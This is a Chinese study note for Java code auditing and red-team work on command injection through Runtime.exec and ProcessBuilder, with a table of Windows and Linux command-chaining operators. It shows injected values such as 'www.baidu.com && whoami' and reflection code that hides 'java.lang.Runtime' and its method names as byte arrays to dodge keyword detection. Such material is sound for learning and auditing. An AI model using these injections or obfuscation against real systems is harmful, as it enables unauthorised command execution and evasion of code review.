#代码审计 #redteam
> Runtime是java执⾏系统命令的⼀个类

### 快速审计
```java
1. 关键词：
	1. Runtime exec 
		1. 字符串
		2. 数组
	2. ProcessBuilder

参数可控
```

#### 不同的Runtime
```java
String cmd = "www.baidu.com";
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("ping -c 3"+cmd).getInputStream()));
String temp;
while((temp=bufferedReader.readLine())!=null){
	System.out.println(temp);
}
```
**当cmd=www.baidu.com && whoami 空输出**
![](media/Pasted%20image%2020240717235122.png)  

```java
String cmd = "www.baidu.com && whoami";
String[] command = {"/bin/bash","-c","ping -c 3 "+cmd};
BufferedReader bufferedReader = new BufferedReader(new
InputStreamReader(Runtime.getRuntime().exec(command).getInputStream()));
String temp;
while((temp=bufferedReader.readLine())!=null){
System.out.println(temp);
}
```
命令执⾏成功
>当命令执⾏注⼊点为**数组**的时候可以进⾏命令注⼊，但是当命令执⾏的注⼊点为字符串是不能进⾏注⼊。原因是因为不同的重载⽅式在底层有不同处理，是否解析&&等命令。并⾮所有的runtime都可以进⾏注⼊，
当然，在**研究层面**的意义上，有绕过的⼿法。将执⾏的具有拼接字符的命令进⾏bash编码

![](media/Pasted%20image%2020240717235421.png)  
![](media/Pasted%20image%2020240717235455.png)  

但这种⽅式在实战中并⽆实际意义，因为在实战过程当中我们⼤部分需要闭合前半部分的语句来构造后半部分。
详细的[分析⽂章](https://f5.pm/go-19610.html)
### 反射和Runtime的结合
详细⻅课件代码演示: runtimeBypass
```java
Class<?> runtimeClass = Class.forName("java.lang.Runtime");
Method getRuntime = runtimeClass.getMethod("getRuntime");
Object runtime = getRuntime.invoke(runtimeClass);
Method exec = runtimeClass.getMethod("exec", String.class);
exec.invoke(runtime, "open .");
```
将硬编码关键字替换为byte数组
```java
String str = "ls";

byte[] srtbyte = str.getBytes();

// 定义"java.lang.Runtime"字符串变量
String rt = new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110,103, 46,82, 117, 110, 116, 105, 109, 101});
System.out.println(rt);
// 反射java.lang.Runtime类获取Class对象
Class<?> c = Class.forName(rt);

// 反射获取Runtime类的getRuntime⽅法
Method m1 = c.getMethod(new String(new byte[]{103, 101, 116, 82, 117,110, 116,105, 109, 101}));
Object m3 = m1.invoke(c);

// 反射获取Runtime类的exec⽅法
Method m2 = c.getMethod(new String(new byte[]{101, 120, 101, 99}),
String.class);

// 反射调⽤Runtime.getRuntime().exec(xxx)⽅法
Object obj2 = m2.invoke(m3, new Object[]{new String(srtbyte)});

// 反射获取Process类的getInputStream⽅法
Method m = obj2.getClass().getMethod(new String(new byte[]{103, 101,116, 73,110, 112, 117, 116, 83, 116, 114, 101, 97, 109}));
m.setAccessible(true);

// 获取命令执⾏结果的输⼊流对象：p.getInputStream()并使⽤Scanner按⾏切割成字符串
Scanner s = new Scanner((InputStream) m.invoke(obj2, new Object[]{})).useDelimiter("\\A");

String result = s.hasNext() ? s.next() : "";
System.out.println(result);
```

### 反射和Process结合
详细⻅课件代码演示: processBypass

不使⽤反射
```java
ProcessBuilder pb = new ProcessBuilder("/bin/bash", "-c","whoami");
Process process = pb.start();
Scanner sc = new Scanner(process.getInputStream()).useDelimiter("\\A");
String results = sc.hasNext() ? sc.next() : null;
sc.close();
System.out.println(results);
```

反射
```java
Class<?> processClass = Class.forName("java.lang.ProcessBuilder");
Constructor<?> constructor = processClass.getConstructor(new Class[] {List.class});
Object o = constructor.newInstance(new ArrayList<>(Arrays.asList("/bin/bash","-c", "whoami")));
Method start = processClass.getMethod("start");
Process invoke = (Process) start.invoke(o);
Scanner sc = new Scanner(invoke.getInputStream()).useDelimiter("\\A");
String results = sc.hasNext() ? sc.next() : null;
sc.close();
System.out.println(results);
```

### 命令拼接符


| **Windows** |                                                               |
| ----------- | ------------------------------------------------------------- |
| &           | ⼀起执⾏，前后都会执⾏                                                   |
| &&          | 如果前⾯的语句为假则直接出错,不执⾏后⾯的语句；如果前⾯为真，两个都会执⾏                         |
| \|          | 显示后⾯语句的执⾏结果 但是前后都会执⾏                                          |
| \|\|        | 如果前⾯执⾏的语句出错则执⾏后⾯的语句，执⾏正常则不会执⾏后⾯ 如：ping 2 \|\| whoami          |
|             |                                                               |
| **Linux**   |                                                               |
| \|          | 显示后⾯语句的执⾏结果 但是前后都会执⾏                                          |
| \|\|        | 如果前⾯执⾏的语句出错泽执⾏后⾯的语句，执⾏正常则不会执⾏后⾯ 例如:ping 1\|\|whoami           |
| ;           | 执⾏完前⾯的语句再执⾏后⾯的                                                |
| &           | 一起执行。前后都执行                                                    |
| &&          | 如果前⾯的语句为假则直接出错，也不执⾏后⾯的，前⾯的语句只能为真 例如:ping<br>127.0.0.1&&whoami |

